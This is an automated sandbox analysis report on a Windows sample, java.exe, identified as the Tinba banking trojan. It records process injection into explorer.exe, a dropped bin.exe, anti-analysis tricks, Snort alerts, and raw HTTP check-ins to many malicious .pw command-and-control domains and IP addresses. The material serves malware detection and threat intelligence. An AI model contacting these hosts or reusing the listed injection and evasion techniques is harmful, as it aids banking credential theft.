Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
java.exe

Overview

General Information

Sample name:java.exe
Analysis ID:1366396
MD5:91493a9a9e83a7b48d178ae10f97028d
SHA1:7f774f01e7f3768de1802226fb6ab15242bea878
SHA256:79dc8da8c5f7b41a0eed67e10e5239355be1c6e089738138dfa3b753fe019355
Tags:exetinba
Infos:

Detection

Tinba
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Tinba Banker
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Exploit detected, runtime environment starts unknown processes
Hooks files or directories query functions (used to hide files and directories)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • java.exe (PID: 7284 cmdline: C:\Users\user\Desktop\java.exe MD5: 91493A9A9E83A7B48D178AE10F97028D)
    • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • winver.exe (PID: 7344 cmdline: winver MD5: B5471B0FB5402FC318C82C994C6BF84D)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • bin.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe" MD5: EA8543BCC2E4689874647E2507DA6B29)
          • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bin.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe" MD5: EA8543BCC2E4689874647E2507DA6B29)
          • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3528 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 3832 cmdline: ctfmon.exe MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • svchost.exe (PID: 4196 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • StartMenuExperienceHost.exe (PID: 4660 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
      • RuntimeBroker.exe (PID: 4872 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SearchApp.exe (PID: 4984 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
      • RuntimeBroker.exe (PID: 5092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • smartscreen.exe (PID: 5584 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
      • TextInputHost.exe (PID: 3788 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
      • RuntimeBroker.exe (PID: 5116 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 1532 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • ApplicationFrameHost.exe (PID: 5736 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
      • WinStore.App.exe (PID: 2524 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
      • RuntimeBroker.exe (PID: 1760 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SystemSettings.exe (PID: 6060 cmdline: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel MD5: 3CD3CD85226FCF576DFE9B70B6DA2630)
      • UserOOBEBroker.exe (PID: 3924 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
      • svchost.exe (PID: 1020 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dllhost.exe (PID: 2944 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • conhost.exe (PID: 2832 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RuntimeBroker.exe (PID: 1184 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • backgroundTaskHost.exe (PID: 1188 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
      • RuntimeBroker.exe (PID: 5100 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • qqQDbrYlXafmy.exe (PID: 2852 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 4500 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 1744 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 4520 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 5568 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 1508 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 2836 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 2640 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 5348 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • qqQDbrYlXafmy.exe (PID: 5668 cmdline: "C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
TinbaF-Secure notes that TinyBanker or short Tinba is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe.If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user's browser activity and if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc in the legitimate-looking page.Tinba may also display socially-engineered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.tinba

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: java.exe PID: 7284JoeSecurity_TinbaYara detected Tinba BankerJoe Security
    Process Memory Space: winver.exe PID: 7344JoeSecurity_TinbaYara detected Tinba BankerJoe Security
      Process Memory Space: explorer.exe PID: 2580JoeSecurity_TinbaYara detected Tinba BankerJoe Security
        Process Memory Space: sihost.exe PID: 3420JoeSecurity_TinbaYara detected Tinba BankerJoe Security
          Process Memory Space: svchost.exe PID: 3456JoeSecurity_TinbaYara detected Tinba BankerJoe Security
            Click to see the 5 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.4216.218.185.16249742802020418 12/22/23-21:31:45.756024
            SID:2020418
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249745802830613 12/22/23-21:31:50.428588
            SID:2830613
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249748802830613 12/22/23-21:31:53.740170
            SID:2830613
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249745802020418 12/22/23-21:31:50.428588
            SID:2020418
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249745802024659 12/22/23-21:31:50.428588
            SID:2024659
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249739802020418 12/22/23-21:31:41.115704
            SID:2020418
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249739802024659 12/22/23-21:31:41.115704
            SID:2024659
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249748802024659 12/22/23-21:31:53.740170
            SID:2024659
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249748802020418 12/22/23-21:31:53.740170
            SID:2020418
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249737802020418 12/22/23-21:31:38.006819
            SID:2020418
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249746802024659 12/22/23-21:31:52.053475
            SID:2024659
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249740802024659 12/22/23-21:31:42.585880
            SID:2024659
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249743802024659 12/22/23-21:31:47.490220
            SID:2024659
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249741802020418 12/22/23-21:31:44.432614
            SID:2020418
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249743802020418 12/22/23-21:31:47.490220
            SID:2020418
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.445.77.249.7949736802024659 12/22/23-21:31:35.805907
            SID:2024659
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.445.77.249.7949736802020418 12/22/23-21:31:35.805907
            SID:2020418
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249739802830613 12/22/23-21:31:41.115704
            SID:2830613
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249737802024659 12/22/23-21:31:38.006819
            SID:2024659
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249746802020418 12/22/23-21:31:52.053475
            SID:2020418
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249738802024659 12/22/23-21:31:39.602700
            SID:2024659
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249743802830613 12/22/23-21:31:47.490220
            SID:2830613
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249738802020418 12/22/23-21:31:39.602700
            SID:2020418
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249744802024659 12/22/23-21:31:48.965379
            SID:2024659
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249741802024659 12/22/23-21:31:44.432614
            SID:2024659
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249735802020418 12/22/23-21:31:19.712756
            SID:2020418
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249740802020418 12/22/23-21:31:42.585880
            SID:2020418
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249735802024659 12/22/23-21:31:19.712756
            SID:2024659
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249744802020418 12/22/23-21:31:48.965379
            SID:2020418
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249737802830613 12/22/23-21:31:38.006819
            SID:2830613
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.445.77.249.7949736802830613 12/22/23-21:31:35.805907
            SID:2830613
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249742802024659 12/22/23-21:31:45.756024
            SID:2024659
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249741802830613 12/22/23-21:31:44.432614
            SID:2830613
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: java.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://evbsdqvgmpph.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://fccfxejgtpqb.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://xtbbpqfrsubt.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://wwgfyvvdtmeq.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://mfueeimvyrsp.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://spaines.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://uyhgqunqkxnx.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://cmnsgscccrej.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://fkmmvfeonnyh.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://gfnlmtcolrrb.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://vcklmnnejwxx.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeAvira: detection malicious, Label: HEUR/AGEN.1322420
            Multi AV Scanner detection for submitted file
            Source: java.exeReversingLabs: Detection: 89%
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: java.exeJoe Sandbox ML: detected
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_02F02DCF CryptAcquireContextA,CryptImportPublicKeyInfo,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,2_2_02F02DCF
            Source: java.exeBinary or memory string: -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAldMoUs9Ytg4Z6u+LBejj XsQpi94U2CbOGCF5DieMHxzcr5nhleioQixxAah9IEXJgzZ8Ag69xjMADnuKMumV xOFw6SbeOhRGrT/al5Rv/X56bsKPBBn5UAR5xhzUielXM77Z8R0oKVOKfXYDXdMq hx6FPFOOnV4/H7u3zf0sUbHXjbJEamXSjWRd0O
            Source: java.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49729 version: TLS 1.2

            Software Vulnerabilities

            barindex
            Exploit detected, runtime environment starts unknown processes
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\System32\conhost.exe

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49735 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49735 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49736 -> 45.77.249.79:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49736 -> 45.77.249.79:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49736 -> 45.77.249.79:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49737 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49737 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49737 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49738 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49738 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49739 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49739 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49739 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49740 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49740 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49741 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49741 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49741 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49742 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49742 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49743 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49743 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49743 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49744 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49744 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49745 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49745 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49745 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49746 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49746 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49748 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49748 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49748 -> 216.218.185.162:80
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: spaines.pwContent-Length: 157Data Raw: fd 32 8e 32 cc 3a 8e 32 13 62 d0 aa fb 30 8f 11 cd 02 be 02 cd 02 be 02 Data Ascii: 22:2b0
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: uyhgqunqkxnx.pwContent-Length: 157Data Raw: 81 b7 8b db b9 bf 8b db 6f e7 d5 43 87 b5 8a f8 b1 87 bb eb b1 87 bb eb Data Ascii: oC
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: vcklmnnejwxx.pwContent-Length: 157Data Raw: c0 9a d3 e5 f9 92 d3 e5 2e ca 8d 7d c6 98 d2 c6 f0 aa e3 d5 f0 aa e3 d5 Data Ascii: .}
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: cmnsgscccrej.pwContent-Length: 157Data Raw: 4f 34 bc a9 75 3c bc a9 a1 64 e2 31 49 36 bd 8a 7f 04 8c 99 7f 04 8c 99 Data Ascii: O4u<d1I6
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: evbsdqvgmpph.pwContent-Length: 157Data Raw: f4 47 54 60 cf 4f 54 60 1a 17 0a f8 f2 45 55 43 c4 77 64 50 c4 77 64 50 Data Ascii: GT`OT`EUCwdPwdP
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: mfueeimvyrsp.pwContent-Length: 157Data Raw: 52 0c 05 15 6e 04 05 15 bc 5c 5b 8d 54 0e 04 36 62 3c 35 25 62 3c 35 25 Data Ascii: Rn\[T6b<5%b<5%
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: utmyhnffxpcj.pwContent-Length: 157Data Raw: a4 50 75 f5 98 58 75 f5 4a 00 2b 6d a2 52 74 d6 94 60 45 c5 94 60 45 c5 Data Ascii: PuXuJ+mRt`E`E
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: fkmmvfeonnyh.pwContent-Length: 157Data Raw: 6d 34 3b 95 50 3c 3b 95 83 64 65 0d 6b 36 3a b6 5d 04 0b a5 5d 04 0b a5 Data Ascii: m4;P<;dek6:]]
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: gfnlmtcolrrb.pwContent-Length: 157Data Raw: 91 76 5a 68 af 7e 5a 68 7f 26 04 f0 97 74 5b 4b a1 46 6a 58 a1 46 6a 58 Data Ascii: vZh~Zh&t[KFjXFjX
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: wwgfyvvdtmeq.pwContent-Length: 157Data Raw: ec b1 0c 1d d3 b9 0c 1d 02 e1 52 85 ea b3 0d 3e dc 81 3c 2d dc 81 3c 2d Data Ascii: R><-<-
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: xtbbpqfrsubt.pwContent-Length: 157Data Raw: f3 e1 ef cd cc e9 ef cd 1d b1 b1 55 f5 e3 ee ee c3 d1 df fd c3 d1 df fd Data Ascii: U
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: vrmtybxxpddg.pwContent-Length: 157Data Raw: ea 5f bf 93 aa 57 bf 93 04 0f e1 0b ec 5d be b0 da 6f 8f a3 da 6f 8f a3 Data Ascii: _W]oo
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: fccfxejgtpqb.pwContent-Length: 157Data Raw: ad ed 2a 61 ec e5 2a 61 43 bd 74 f9 ab ef 2b 42 9d dd 1a 51 9d dd 1a 51 Data Ascii: *a*aCt+BQQ
            Source: Joe Sandbox ViewIP Address: 216.218.185.162 216.218.185.162
            Source: Joe Sandbox ViewASN Name: HURRICANEUS HURRICANEUS
            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
